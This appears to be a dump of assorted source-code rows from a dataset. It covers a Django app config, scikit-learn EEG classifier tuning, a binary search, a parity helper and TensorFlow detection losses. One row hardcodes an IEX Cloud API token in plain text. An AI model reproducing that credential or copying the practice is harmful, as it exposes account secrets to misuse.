mscAtmIfVptPnniEbrTotalPathOptimizations=mscAtmIfVptPnniEbrTotalPathOptimizations, mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName, mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName, mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry, mscAtmIfVptVccSrcEbrOvRecoverySubscribed=mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA, mscAtmIfVccEbrInfoTotalConnectionRecoveries=mscAtmIfVccEbrInfoTotalConnectionRecoveries)
|
4,890 | 0754103c2d8cef0fd23b03a8f64ade8f049bce48 | from django.apps import AppConfig
class GerenciaLedsConfig(AppConfig):
    """Django application configuration for the ``gerencia_leds`` app."""

    # App label / dotted path Django uses to register the application.
    name = 'gerencia_leds'
|
4,891 | 86849d0e63cdb93a16497ca56ff9c64c15a60fa7 | IEX_CLOUD_API_TOKEN = 'Tpk_5d9dc536610243cda2c8ef4787d729b6' |
4,892 | d8e8ecbf77828e875082abf8dcbfbc2c29564e20 | #!/usr/bin/env python
# -*- coding: utf-8 -*
#Perso
from signalManipulation import *
from manipulateData import *
#Module
import pickle
from sklearn import svm, grid_search
from sklearn.linear_model import ElasticNetCV, ElasticNet, RidgeClassifier
from sklearn.metrics import confusion_matrix, f1_score, accuracy_score, roc_auc_score
from sklearn.preprocessing import scale
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import Pipeline
from sklearn.cross_validation import StratifiedKFold
from copy import copy,deepcopy
import pylab as pl
#======================== TOOLS ========================
#======================================================
def writeResults(results, best_params, best_score, modelType, penalty, scoreType,\
                 transformedData, scores=None):
    """
    Write results of a grid_search in a file.

    Parameters
    ----------
    results : list of (params_dict, mean_score, fold_scores) triples, as
        produced by sklearn's ``GridSearchCV.grid_scores_``.
    best_params : dict of the best hyper-parameters found.
    best_score : float, cross-validation score of the best model.
    modelType : str, one of 'NonLinear', 'ElasticNet', 'Pipe', 'Ridge' or
        anything else for the linear case; selects which parameters are
        written on each line.
    penalty, scoreType, transformedData : str labels used to build the
        output file name.
    scores : dict from getScores() or None; when None only the
        cross-validation table is written.

    Output file format:
    [parameters] [score] [STD]
    ...
    [Confusion Matrix of the best model on train]
    [Confusion Matrix of the best model on test]
    Best Params : XXXX Score CV : XXX%
    Accuracy Train : XX Accuracy Test : XX
    F1 Train : XX F1 Test : XX

    Ex :
    1.3 0.91
    1.7 0.65
    [[9787 4]
    [ 399 520]]
    [[6690 276]
    [ 598 30]]
    Best Params : 1.3 Score CV : 0.91
    Accuracy Train : 0.91 Accuracy Test : 0.80
    F1 Train : 0.80 F1 Test : 0.50
    """
    strScores = ""
    # One line per hyper-parameter combination:
    # model[0] is the parameter dict, model[1] the mean CV score,
    # model[2] the per-fold scores (reduced to a standard deviation).
    if modelType=='NonLinear':
        for model in results:
            print(model)
            strScores += "{:.4} {} {} {}\n".format(model[0]['C'], model[0]['gamma'], model[1], np.std(model[2]))
    elif modelType=='ElasticNet':
        for model in results:
            print(model)
            strScores += "{:.4} {} {} {}\n".format(model[0]['alpha'], model[0]['l1_ratio'], model[1], np.std(model[2]))
    elif modelType=='Pipe':
        for model in results:
            print(model)
            # Pipelines may be tuned on C (SVM) or alpha (ridge).
            if 'classif__C' in model[0].keys():
                strScores += "{} {:.4} {} {}\n".format(model[0]['csp__n_components'], model[0]['classif__C'], model[1], np.std(model[2]))
            else:
                strScores += "{} {:.4} {} {}\n".format(model[0]['csp__n_components'], model[0]['classif__alpha'], model[1], np.std(model[2]))
    elif modelType=='Ridge':
        for model in results:
            print(model)
            strScores += "{:.4} {} {}\n".format(model[0]['alpha'], model[1], np.std(model[2]))
    else: #Linear, C is the only parameter
        for model in results:
            print(model)
            strScores += "{:.4} {} {}\n".format(model[0]['C'], model[1], np.std(model[2]))
    strScores += "Best Params : {} Score CrossVal : {} \n".format(best_params, best_score)
    if scores:
        # Append train/test confusion matrices and metrics of the best model.
        strScores += "{}\n{}\n".format(str(scores['cMatrixTrain']),\
                                       str(scores['cMatrixTest']))
        strScores += "Accuracy Train : {} Accuracy Test : {} \n".format(scores['accTrain'], scores['accTest'])
        strScores += "F1 Train : {} F1 Test : {} \n".format(scores['f1Train'],\
                                                            scores['f1Test'])
        strScores += "Roc_Auc Train : {} Roc_Auc Test : {} \n".format(scores['rocTrain'],scores['rocTest'])
    else:
        print("No Test file")
        strScores += "\nNo Test file\n=========\n"
    # NOTE(review): RESULTS_PATH is a global, presumably provided by the
    # star-imports at the top of the file -- confirm it is defined.
    f = open("{}{}HyperSelection{}{}{}.txt".format(RESULTS_PATH, penalty, modelType.title(), scoreType.title(), transformedData.title()), 'w')
    f.write(strScores)
    f.close()
def getScores(y, yPredTrain, yTest, yPredTest):
    """Compute F1, accuracy, ROC-AUC and confusion matrices on train and test.

    Also stores, under the key 'random', the accuracy a constant
    majority-class predictor would reach on the training labels.
    """
    metrics = {
        'f1Train': f1_score(y, yPredTrain),
        'f1Test': f1_score(yTest, yPredTest),
        'accTrain': accuracy_score(y, yPredTrain),
        'accTest': accuracy_score(yTest, yPredTest),
        'rocTrain': roc_auc_score(y, yPredTrain),
        'rocTest': roc_auc_score(yTest, yPredTest),
        'cMatrixTrain': confusion_matrix(y, yPredTrain),
        'cMatrixTest': confusion_matrix(yTest, yPredTest),
    }
    # Fraction of positive labels; the majority-class accuracy is that
    # fraction, or its complement when positives are the minority.
    positive_rate = float(len(np.where(y == 1)[0])) / len(y)
    metrics['random'] = positive_rate if positive_rate >= 0.50 else 1 - positive_rate
    return metrics
def printScores(scores):
    """Pretty-print the metrics dict produced by getScores() and return it.

    Parameters
    ----------
    scores : dict with keys 'accTrain', 'rocTrain', 'f1Train',
        'cMatrixTrain', 'accTest', 'rocTest', 'f1Test', 'cMatrixTest'
        and 'random'.

    Returns
    -------
    str : the formatted report (also printed to stdout).
    """
    strSave = "Train :\n"
    strSave += "Accuracy : {}\n".format(scores['accTrain'])
    strSave += "Roc_Auc : {}\n".format(scores['rocTrain'])
    strSave += "F1 : {}\n".format(scores['f1Train'])
    strSave += "{}\n".format(scores['cMatrixTrain'])
    strSave += "Test :\n"
    strSave += "Accuracy : {}\n".format(scores['accTest'])
    strSave += "Roc_Auc : {}\n".format(scores['rocTest'])
    strSave += "F1 : {}\n".format(scores['f1Test'])
    strSave += "{}\n".format(scores['cMatrixTest'])
    strSave += "Random Accuracy : {}".format(scores['random'])
    # Fix: the original used the Python-2-only statement `print strSave`
    # (a SyntaxError on Python 3). The call form prints identically on
    # Python 2 and is consistent with the rest of this module.
    print(strSave)
    return strSave
def testModel(best,X,y,xTest,yTest,penalty):
    """Evaluate a fitted estimator on train and test data and print metrics.

    best : fitted sklearn estimator exposing predict().
    X, y / xTest, yTest : train and test data.
    penalty : str; 'l1' additionally triggers a sparsity analysis of the
        model coefficients.

    Returns the metrics dict from getScores().
    """
    print("Predicting Data :")
    yPredTrain = best.predict(X)
    yPredTest = best.predict(xTest)
    scores = getScores(y, yPredTrain, yTest, yPredTest)
    printScores(scores)
    if penalty=='l1':
        # NOTE(review): `transformedData` is not a parameter here -- it is
        # resolved as a global, presumably set by the calling script or the
        # star-imports above. Verify it is defined before calling with
        # penalty='l1'.
        saveNonZerosCoef(best, 'l1', dataType=transformedData)
        # NOTE(review): saveNonZerosCoef() already calls analyzeCoef()
        # internally, so the analysis below runs a second time -- confirm
        # whether the duplicate run is intended.
        analyzeCoef(dataType=transformedData, reg='l1')
    return scores
def saveNonZerosCoef(clf, reg, dataType):
    """Save the indices of the non-zero coefficients of a fitted linear model.

    Writes the feature-index list to 'nonZerosParams<DataType><reg>' and then
    runs analyzeCoef() on that file.

    clf : fitted sklearn linear model exposing `coef_`.
    reg : str regularization label used in the file name (e.g. 'l1').
    dataType : str data-representation label used in the file name.
    """
    # Fix: for a binary LinearSVC, coef_ has shape (1, n_features); on a 2-D
    # array np.where(...)[0] returns the ROW indices (all zeros), not the
    # feature indices. Flattening first yields the actual feature indices
    # and also works for 1-D coef_ arrays.
    coefs = np.ravel(clf.coef_)
    nonZerosParams = np.where(coefs != 0)[0]
    print("Nombre de coef : ", len(coefs))
    # Fix: the original message said "annulés" (zeroed out) although this is
    # the count of coefficients that were NOT zeroed.
    print("Nombre de coef non nuls : ", len(nonZerosParams))
    with open('nonZerosParams{}{}'.format(dataType.title(),reg), 'w') as f:
        f.write(str(list(nonZerosParams)))
    analyzeCoef(dataType, reg)
def analyzeCoef(dataType, reg):
    """Plot histograms of the surviving (non-zero) coefficient indices.

    Reads the index list written by saveNonZerosCoef() and plots how many
    coefficients were kept per time step (index % 40) and per electrode
    (index // 40). Figures are saved under Images/Screenshots/ and shown
    interactively.

    dataType : str data-representation label used in the file names.
    reg : str regularization label used in the file names.
    """
    path = "Images/Screenshots/"
    # The file contains the str() of a Python list, e.g. "[1, 2, 3]".
    with open('nonZerosParams{}{}'.format(dataType.title(),reg), 'r') as f:
        wholeFile = f.read()
        print("Here")
        print(wholeFile[0], wholeFile[-1])
        # Strip the surrounding '[' and ']' so the content splits on ','.
        wholeFile = wholeFile[1:-1]
    numGen = map(int,wholeFile.split(','))
    #Step
    # Feature layout assumed electrode-major: index = electrode*40 + step,
    # so index % 40 is the time step -- TODO confirm against manipulateData.
    step = np.zeros(40)
    steps = np.array([i+1 for i in range(40)])
    for num in numGen:
        step[num%40] += 1
    # map() is a one-shot iterator (consumed by the loop above on Python 3),
    # hence it is rebuilt for the second pass.
    numGen = map(int,wholeFile.split(','))
    #Elec
    elec = np.zeros(64)
    elecs = np.array([i+1 for i in range(64)])
    for num in numGen:
        elec[num//40] += 1
    ax = plt.subplot()
    # NOTE(review): under Python 2 (this module uses py2 print statements),
    # `steps/60` and `1/60` are integer divisions evaluating to 0 -- confirm
    # that `from __future__ import division` is in effect via the star
    # imports above, otherwise the x-axis and bar widths collapse.
    steps = np.array(steps)/60
    ax.bar(steps, step, width=1/60)
    ax.set_title("Nombre de coefficients non annulés par pas de temps")
    plt.savefig(path+'nonZerosStep{}{}.png'.format(dataType.title(),reg))
    plt.show()
    ax = plt.subplot()
    ax.bar(elecs, elec, width=1)
    ax.set_title("Nombre de coefficients non annulés par electrode")
    plt.savefig(path+'nonZerosElec{}{}.png'.format(dataType.title(),reg))
    plt.show()
#=============== Learner =============================
#====================================================
def learnHyperLinear(X, y, xTest, yTest, penalty, scoring, transformedData,jobs=1):
    """Grid-search the C hyper-parameter of a linear SVM (5-fold CV).

    When a non-empty test set is supplied, the best model is refitted,
    evaluated on it, and all results are written to a file; otherwise only
    the cross-validation table is written.
    """
    # An empty test set means: select hyper-parameters only, never refit.
    has_test_set = np.size(xTest, 0) != 0
    # l1 regularization requires the primal formulation of LinearSVC.
    use_dual = penalty != 'l1'
    grid = grid_search.GridSearchCV(
        svm.LinearSVC(penalty=penalty, class_weight=CLASS_WEIGHT, dual=use_dual),
        {'C': np.logspace(-5, 1, 3)},
        scoring=scoring, cv=5, n_jobs=jobs, verbose=3, refit=has_test_set)
    print("Begin\n...")
    grid.fit(X, y)
    print(grid.best_params_, grid.best_score_)
    if has_test_set:
        test_scores = testModel(grid.best_estimator_, X, y, xTest, yTest, penalty)
    else:
        print("No test, don't predict data")
        test_scores = None
    writeResults(grid.grid_scores_, grid.best_params_, grid.best_score_, 'Linear',
                 penalty, scoring, transformedData, scores=test_scores)
def learnHyperNonLinear(X, y, xTest, yTest, scoring, transformedData,jobs=1):
    """Grid-search C and gamma for an RBF-kernel SVM (5-fold CV).

    When a non-empty test set is supplied, the best model is refitted,
    evaluated on it, and all results are written to a file; otherwise only
    the cross-validation table is written.
    """
    has_test_set = np.size(xTest, 0) != 0
    # Joint log-spaced grid over the soft-margin (C) and kernel-width
    # (gamma) parameters.
    grid = grid_search.GridSearchCV(
        svm.SVC(class_weight=CLASS_WEIGHT),
        {'C': np.logspace(-5, 2, 8), 'gamma': np.logspace(-5, 2, 8)},
        scoring=scoring, cv=5, n_jobs=jobs, verbose=3, refit=has_test_set)
    print("Begin\n...")
    grid.fit(X, y)
    print(grid.best_params_, grid.best_score_)
    if has_test_set:
        test_scores = testModel(grid.best_estimator_, X, y, xTest, yTest, 'l2')
    else:
        print("No test, don't predict data")
        test_scores = None
    writeResults(grid.grid_scores_, grid.best_params_, grid.best_score_,
                 'NonLinear', 'l2', scoring, transformedData, scores=test_scores)
def learnRidge(X,y,xTest,yTest,scoring, transformedData, jobs):
    """Grid-search the alpha hyper-parameter of a ridge classifier (10-fold CV).

    When a non-empty test set is supplied, the best model is refitted,
    evaluated on it, and all results are written to a file; otherwise only
    the cross-validation table is written.
    """
    has_test_set = np.size(xTest, 0) != 0
    grid = grid_search.GridSearchCV(
        RidgeClassifier(class_weight=CLASS_WEIGHT),
        {'alpha': np.logspace(-3, 3, 6)},
        scoring=scoring, cv=10, n_jobs=jobs, verbose=3, refit=has_test_set)
    print("Begin\n...")
    grid.fit(X, y)
    print(grid.best_params_, grid.best_score_)
    if has_test_set:
        test_scores = testModel(grid.best_estimator_, X, y, xTest, yTest, 'l2')
    else:
        print("No test, don't predict data")
        test_scores = None
    writeResults(grid.grid_scores_, grid.best_params_, grid.best_score_, 'Ridge',
                 'l2', scoring, transformedData, scores=test_scores)
def learnRandomForest(X,y,xTest,yTest,scoring, jobs):
    """Grid-search a random forest (3-fold CV) and print train/test metrics.

    Unlike the other learners this one does not write a result file. It now
    returns the metrics dict (previously None) so callers can persist it --
    a backward-compatible addition.
    """
    params = {
        'n_estimators':[2,10,100],
        'max_features':['auto',2,10],
        'max_depth':[10,40,2],
        'min_samples_split':[2,10,20,50]
        }
    forest = RandomForestClassifier()
    grd = grid_search.GridSearchCV(forest,params, scoring=scoring,cv=3,n_jobs=jobs,verbose=3)
    grd.fit(X,y)
    yPredTrain = grd.predict(X)
    yPredTest = grd.predict(xTest)
    # Fix: call form instead of the Python-2-only `print "..."` statement
    # (identical output on py2, valid and consistent on py3).
    print("FOREST : \n")
    scores = getScores(y, yPredTrain, yTest, yPredTest)
    printScores(scores)
    return scores
def learnCspPipeline(X, y, xTest, yTest, scoring,transformedData,jobs=1, classifier='lin'):
    """Grid-search a CSP -> classifier pipeline (5-fold CV).

    X / xTest are reshaped from vectors to matrices via vecToMat() before
    fitting. `classifier` selects the final stage: 'lin' for a linear SVM
    (tuning C), anything else for a ridge classifier (tuning alpha). The
    number of CSP components is searched jointly with the classifier
    hyper-parameter; results go through testModel()/writeResults().
    """
    testAvailable = np.size(xTest)
    X = vecToMat(X)
    if testAvailable:
        xTest = vecToMat(xTest)
    if classifier=='lin':
        classif = svm.LinearSVC(penalty='l2',class_weight=CLASS_WEIGHT)
        params = np.logspace(-5,1,3)
        hyper = 'classif__C'
    else:
        classif = RidgeClassifier(class_weight=CLASS_WEIGHT)
        params = np.logspace(-1,3,10)
        hyper = 'classif__alpha'
    csp = CSP(reg='ledoit_wolf',log=False)
    # Fix: the original built a Pipeline containing a StandardScaler step and
    # immediately overwrote it with this one -- the scaler variant was dead
    # code and has been removed.
    pipe = Pipeline(steps = [('csp',csp), ('classif',classif)])
    n_components = [1,2,5,10,20,30,40,50]
    dico = {'csp__n_components':n_components, hyper:params}
    # Fix: honor the `jobs` parameter (it was ignored; n_jobs was hard-coded
    # to 4). NOTE(review): `scoring` is still not forwarded to GridSearchCV
    # (the estimator's default score is used) -- confirm whether intended.
    grd = grid_search.GridSearchCV(pipe,dico, cv=5, verbose=3, n_jobs=jobs)
    grd.fit(X,y)
    if testAvailable:
        scores = testModel(grd.best_estimator_,X,y,xTest,yTest,'l2')
        writeResults(grd.grid_scores_, grd.best_params_, grd.best_score_,'Pipe', 'l2', scoring, transformedData, scores=scores)
    else:
        print("No test, don't predict data")
        writeResults(grd.grid_scores_, grd.best_params_, grd.best_score_,'Pipe', 'l2', scoring, transformedData, scores=None)
def learnElasticNet(X,y,xTest,yTest,scoring,transformedData='raw',jobs=1):
    """Grid-search alpha / l1_ratio for an ElasticNet regressor (5-fold CV).

    The regressor's continuous predictions are thresholded at 0 to recover
    +/-1 class labels before scoring. Also saves the indices of the
    non-zero coefficients of the best model to 'nonZerosParamsRawElasticNet'.
    """
    # Parameters selection
    #====================
    alpha = np.linspace(0.01,0.2,5)
    l1_ratio = np.linspace(0.01,0.3,5)
    parameters = {'alpha': alpha, 'l1_ratio': l1_ratio}
    #Creating Model and begin classification
    #=======================================
    classif = ElasticNet(selection='random')
    clf = grid_search.GridSearchCV(classif, parameters, scoring=scoring, cv=5, n_jobs=jobs,verbose=3)
    print("Begin\n...")
    clf.fit(X,y)
    #Get results, print and write them into a file
    #============================================
    best = clf.best_estimator_
    print(clf.best_params_, clf.best_score_)
    # Fix: the original tested np.size(a, 0) where `a` was never defined
    # (NameError whenever this branch ran); the intent is "is the test set
    # non-empty", mirroring the other learners.
    if np.size(xTest,0)!=0:
        print("Predicting Data :")
        yPredTrain = best.predict(X)
        # Threshold the regression output at 0 to recover +/-1 labels.
        yPredTrain[yPredTrain >= 0] = 1
        yPredTrain[yPredTrain < 0] = -1
        yPredTest = best.predict(xTest)
        yPredTest[yPredTest >= 0] = 1
        yPredTest[yPredTest < 0] = -1
        scores = getScores(y, yPredTrain, yTest, yPredTest)
        printScores(scores)
        writeResults(clf.grid_scores_, clf.best_params_, clf.best_score_,\
                     'ElasticNet', 'l1l2', scoring, transformedData, scores)
    # ElasticNet coef_ is 1-D, so these are feature indices directly.
    nonZerosParams = np.where(best.coef_ != 0)[0]
    print(len(nonZerosParams))
    print(nonZerosParams)
    with open('nonZerosParamsRawElasticNet', 'w') as f:
        f.write(str(list(nonZerosParams)))
def learnStep(X, y, xTest, yTest, penalty, scoring, transformedData,jobs=1):
    """Greedy backward elimination of time steps.

    Each round tries removing every remaining time step in turn, re-runs a
    C grid search for a linear SVM (5-fold CV) and scores the refitted model
    on the test set; the step whose removal yields the best test score is
    then dropped permanently. Stops once the best score has failed to
    improve more than 3 times. Results are only printed, not returned.

    NOTE(review): `penalty` is accepted but the classifier is hard-coded to
    l2 -- confirm whether intended.
    """
    baseClf = svm.LinearSVC(penalty='l2', class_weight=CLASS_WEIGHT)
    cRange = [1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1, 10]
    parameters = {'C': cRange}
    best_score = 0
    # Features are assumed grouped as 64 electrodes x numStep time steps.
    numStep = np.size(X,1)//64
    keptStep = np.ones(numStep, dtype=bool)
    # Pristine copies: X / xTest are destructively filtered on each trial.
    copyX = copy(X)
    copyXTest = copy(xTest)
    scores = np.zeros(numStep)
    scoreDecrease = False
    numFailed = 0
    while not scoreDecrease:
        scores[:] = 0
        for step in range(numStep):
            if not keptStep[step] :
                # Step already eliminated in a previous round.
                continue
            else:
                # Remove the already-eliminated steps plus the candidate one.
                erased = list(np.where(keptStep==False)[0])
                if erased != []:
                    erased.append(step)
                    X = delTimeStep(X, erased, transformedData)
                    xTest = delTimeStep(xTest, erased, transformedData)
                else:
                    X = delTimeStep(X,step, transformedData)
                    xTest = delTimeStep(xTest, step, transformedData)
            print("Learning Model without step N°",step)
            clf = grid_search.GridSearchCV(baseClf, parameters, scoring=scoring,\
                                           cv=5, n_jobs=jobs, verbose=3)
            clf.fit(X,y)
            best = clf.best_estimator_
            print(clf.best_params_, clf.best_score_)
            yPredTest = best.predict(xTest)
            if scoring=='f1':
                scores[step] = f1_score(yTest, yPredTest)
            else:
                scores[step] = roc_auc_score(yTest, yPredTest)
            print("Score :", scores[step])
            #post process :
            # Restore the untouched data before trying the next candidate.
            X = copy(copyX)
            xTest = copy(copyXTest)
        # Permanently drop the step whose removal scored best this round.
        worstStep = np.argmax(scores)
        keptStep[worstStep] = False
        print("Score max : {}, removing step N°{}".format(scores[worstStep], worstStep))
        print("Step removed : ", np.where(keptStep==False))
        print("Past Best : ", best_score)
        if scores[worstStep] > best_score:
            best_score = scores[worstStep]
        else:
            numFailed += 1
            if numFailed > 3:
                scoreDecrease = True
def learnElecFaster(X, y, xTest, yTest, penalty, scoring, transformedData,jobs=1):
    """Greedy backward elimination of electrodes (64 assumed).

    Merges train and test data (selection is by cross-validation only),
    then for 63 rounds tries removing each remaining electrode, scores a
    fixed-C linear SVM by 10-fold CV, and permanently drops the electrode
    whose removal scores best. Progress is appended to 'selecStep.txt'.

    NOTE(review): `penalty` is accepted but the classifier is hard-coded to
    l2, and C is hard-coded to 1e-5 (the grid search that used to pick it
    is commented out) -- confirm whether intended. Also, `scoreDecrease`
    and `numFailed` no longer stop the loop here (unlike learnStep): all
    63 rounds always run.
    """
    baseClf = svm.LinearSVC(penalty='l2', class_weight=CLASS_WEIGHT)
    cRange = np.logspace(-5,2,8)
    parameters = {'C': cRange}
    # Fold the test set into training data: evaluation is CV-based below.
    if np.size(xTest)!=0:
        X = np.concatenate((X,xTest))
        y = np.concatenate((y,yTest))
    # clf = grid_search.GridSearchCV(baseClf, parameters, scoring=scoring, cv=5, n_jobs=jobs, verbose=3)
    # clf.fit(X,y)
    # bestParams = clf.best_params_
    # print(bestParams['C'], clf.best_score_)
    # C = bestParams['C']
    C = 1e-5
    baseClf = svm.LinearSVC(penalty='l2', class_weight=CLASS_WEIGHT)
    best_score = 0
    best_selection = []
    keptElec = np.ones(64, dtype=bool)
    # Pristine copy: X is destructively filtered on each trial below.
    copyX = copy(X)
    scores = np.zeros(64)
    scoreDecrease = False
    numFailed = 0
    for numIter in range(63):
        scores[:] = 0
        for elec in range(64):
            if not keptElec[elec] :
                #Already deleted
                continue
            else:
                print("Deleting Electrode(s) ...")
                # Remove the already-eliminated electrodes plus the candidate.
                erased = list(np.where(keptElec==False)[0])
                if erased != []:
                    erased.append(elec)
                    X = delElec(X, erased, transformedData)
                else:
                    X = delElec(X,elec, transformedData)
            print("Learning Model without elec N°",elec)
            # Single-point "grid" over the fixed C: used only for its CV score.
            clf = grid_search.GridSearchCV(baseClf, {'C':[C]}, scoring=scoring, cv=10, n_jobs=jobs, verbose=1)
            clf.fit(X,y)
            scores[elec] = clf.best_score_
            print(scores[elec])
            #post process :
            # Restore the untouched data before trying the next candidate.
            X = copy(copyX)
        # Permanently drop the electrode whose removal scored best this round.
        worstElec = np.argmax(scores)
        keptElec[worstElec] = False
        removedElec = np.where(keptElec==False)
        print("Score max : {}, removing elec N°{}".format(scores[worstElec], worstElec))
        print("Elec removed : ", removedElec)
        print("Past Best : ", best_score, "with : ", best_selection)
        if scores[worstElec] > best_score:
            best_score = scores[worstElec]
            best_selection = np.where(keptElec==False)
        else:
            numFailed += 1
        with open("selecStep.txt",'a') as f:
            f.write("{} : {} with elec {}, numFailed : {}\n".format(numIter, scores[worstElec], removedElec, numFailed))
|
def findFirst(arr, l, h, x):
    """Return the index of the FIRST occurrence of x in sorted arr[l..h], or -1.

    Fix: the original returned whichever matching index the binary search
    happened to probe first, not the leftmost one, despite its name. It now
    keeps searching left after a hit.
    """
    if l > h:
        return -1
    mid = (l + h) // 2
    if arr[mid] == x:
        # mid is the answer only if nothing earlier also matches.
        earlier = findFirst(arr, l, mid - 1, x)
        return mid if earlier == -1 else earlier
    elif arr[mid] > x:
        return findFirst(arr, l, mid - 1, x)
    return findFirst(arr, mid + 1, h, x)


def indexes(arr, x):
    """Return [first, last] indices of x in the sorted list arr, or [-1, -1]."""
    n = len(arr)
    first = findFirst(arr, 0, n - 1, x)
    if first == -1:
        return [-1, -1]
    # findFirst now guarantees the leftmost index; only scan right for the last.
    last = first
    while last + 1 < n and arr[last + 1] == x:
        last += 1
    return [first, last]


print(indexes([1, 2, 5, 5, 5, 5, 5, 12, 45, 67], 5))
4,894 | 17f91b612fad14200d2911e2cb14e740b239f9ff | #!/usr/bin/python3
def divisible_by_2(my_list=None):
    """Return a list of booleans: True where the element is even.

    Returns None for None or an empty list (original behavior kept).
    The default was changed from the mutable `[]` to None -- behavior is
    identical (an empty list also returned None) while avoiding the
    shared-mutable-default pitfall.
    """
    if my_list is None or len(my_list) == 0:
        return None
    # Comprehension replaces the manual append-True/append-False loop.
    return [num % 2 == 0 for num in my_list]
|
4,895 | 6e17fef4507c72190a77976e4a8b2f56880f2d6f | import tensorflow as tf
import bbox_lib
def hard_negative_loss_mining(c_loss, negative_mask, k):
    """Sum the k largest classification losses among negative anchors.

    c_loss: per-anchor classification loss.
    negative_mask: 1.0 where the anchor is a negative example, 0.0 elsewhere.
    k: number of hard negatives to keep (clamped below to at least 1 and
       above to the number of anchors).
    """
    k = tf.maximum(k, 1)
    k = tf.minimum(k, c_loss.shape[-1])
    # Zero out non-negative anchors, then keep only the k largest losses.
    masked_loss = c_loss * negative_mask
    hardest_losses = tf.nn.top_k(masked_loss, k)[0]
    return tf.reduce_sum(hardest_losses)
def compute_loss(network_output, bboxes, labels, num_classes, c_weight, r_weight,
                 neg_label_value, ignore_label_value, negative_ratio):
    """Compute the weighted detection loss (classification + box regression).

    network_output : [classification, regression] feature maps from the model.
    bboxes : per-anchor regression targets (batch, num_anchors, 4).
    labels : per-anchor class labels; neg_label_value marks negatives and
        ignore_label_value marks anchors excluded from the loss.
    negative_ratio : number of hard negatives kept per positive anchor.

    Returns (total_loss, classification_loss, regression_loss).
    """
    with tf.variable_scope("losses"):
        batch_size = bboxes.shape[0].value
        # labels + 1 shifts class ids so the negative class maps to slot 0 --
        # assumes neg_label_value is -1; TODO confirm with the label encoder.
        one_hot_labels = tf.one_hot(labels + 1, num_classes + 1)
        negative_mask = tf.cast(tf.equal(labels, neg_label_value), tf.float32)
        # Positive anchors: neither ignored nor negative.
        positive_mask = tf.cast(tf.logical_and(tf.not_equal(labels, ignore_label_value),
                                               tf.not_equal(labels, neg_label_value)), tf.float32)
        with tf.variable_scope("classification_loss"):
            classification_output = network_output[0]
            classification_output = tf.reshape(
                classification_output, [batch_size, -1, num_classes + 1])
            c_loss = tf.losses.softmax_cross_entropy(
                one_hot_labels, classification_output, reduction=tf.losses.Reduction.NONE)
            num_positive = tf.cast(tf.reduce_sum(positive_mask), tf.int32)
            pos_c_loss = tf.reduce_sum(c_loss * positive_mask)
            # Keep only the hardest negatives (negative_ratio per positive).
            neg_c_loss = hard_negative_loss_mining(c_loss, negative_mask,
                                                   num_positive * negative_ratio)
            c_loss = (pos_c_loss + neg_c_loss) / batch_size
        with tf.variable_scope("regression_loss"):
            regression_output = network_output[1]
            regression_output = tf.reshape(
                regression_output, [batch_size, -1, 4])
            r_loss = tf.losses.huber_loss(regression_output, bboxes, delta=1,
                                          reduction=tf.losses.Reduction.NONE)
            # Regression loss counts only on positive anchors.
            r_loss = tf.reduce_sum(
                r_loss * positive_mask[..., tf.newaxis]) / batch_size
    return c_weight * c_loss + r_weight * r_loss, c_loss, r_loss
def predict(network_output, mask, score_threshold, neg_label_value, anchors,
            max_prediction, num_classes):
    """Decode predictions from the neural network.

    For each image in the batch: softmax the class scores, keep anchors that
    are confident, non-background and whose center lies inside `mask`, decode
    the regression output into boxes, and apply non-max suppression.

    Returns (bbox_list, label_list): one tensor of boxes and one of labels
    per image in the batch. NOTE(review): `neg_label_value` is accepted but
    unused here (background is filtered via the argmax -1 trick below) --
    confirm whether intended.
    """
    classification_output = network_output[0]
    batch_size, _, _, output_dim = classification_output.get_shape().as_list()
    regression_output = network_output[1]
    bbox_list = []
    label_list = []
    # Integer (y, x) anchor centers, used to look anchors up in the mask.
    ay, ax, ah, aw = bbox_lib.get_center_coordinates_and_sizes(anchors)
    anchor_center_index = tf.cast(tf.transpose(tf.stack([ay, ax])), tf.int32)
    for single_classification_output, single_regression_output, single_mask in zip(
            classification_output, regression_output, mask):
        # num_classes + 1 due to the negative class.
        single_classification_output = tf.reshape(
            single_classification_output, [-1, num_classes + 1])
        single_classification_output = tf.nn.softmax(
            single_classification_output, -1)
        max_confidence = tf.reduce_max(single_classification_output, -1)
        confident_mask = max_confidence > score_threshold
        # - 1 due to the negative class.
        max_index = tf.argmax(single_classification_output, 1) - 1
        # Background predictions end up at -1 after the shift above.
        non_negative_mask = tf.not_equal(max_index, -1)
        in_mask = tf.gather_nd(single_mask, anchor_center_index)
        foreground_mask = tf.logical_and(
            in_mask, tf.logical_and(confident_mask, non_negative_mask))
        valid_labels = tf.boolean_mask(max_index, foreground_mask)
        single_regression_output = tf.reshape(single_regression_output, [-1, 4])
        predicted_bbox = bbox_lib.decode_box_with_anchor(
            single_regression_output, anchors)
        valid_boxes = tf.boolean_mask(predicted_bbox, foreground_mask)
        valid_confidence_score = tf.boolean_mask(
            max_confidence, foreground_mask)
        # NMS keeps at most max_prediction boxes per image.
        selected_indices = tf.image.non_max_suppression(
            valid_boxes, valid_confidence_score, max_prediction)
        valid_boxes = tf.gather(valid_boxes, selected_indices)
        valid_labels = tf.gather(valid_labels, selected_indices)
        bbox_list.append(valid_boxes)
        label_list.append(valid_labels)
    return bbox_list, label_list
def build_model(num_classes, anchor_num_per_output):
    """Build a detection model on top of a frozen ImageNet ResNet50 backbone.

    Returns a Keras model whose outputs are [classification, regression]
    feature maps with (num_classes + 1) * anchors and 4 * anchors channels
    respectively (+1 for the background class).
    """
    backbone = tf.keras.applications.resnet50.ResNet50(
        include_top=False, weights="imagenet")
    # Freeze the pretrained backbone; only the two heads are trained.
    for layer in backbone.layers:
        layer.trainable = False
    features = backbone.get_layer(name='activation_39').output
    features = tf.keras.layers.Dropout(0.5)(features)
    classification_branch = tf.keras.layers.Conv2D(
        (num_classes + 1) * anchor_num_per_output, (1, 1))(features)
    regression_branch = tf.keras.layers.Conv2D(
        4 * anchor_num_per_output, (1, 1))(features)
    return tf.keras.models.Model(
        backbone.input, [classification_branch, regression_branch])
|
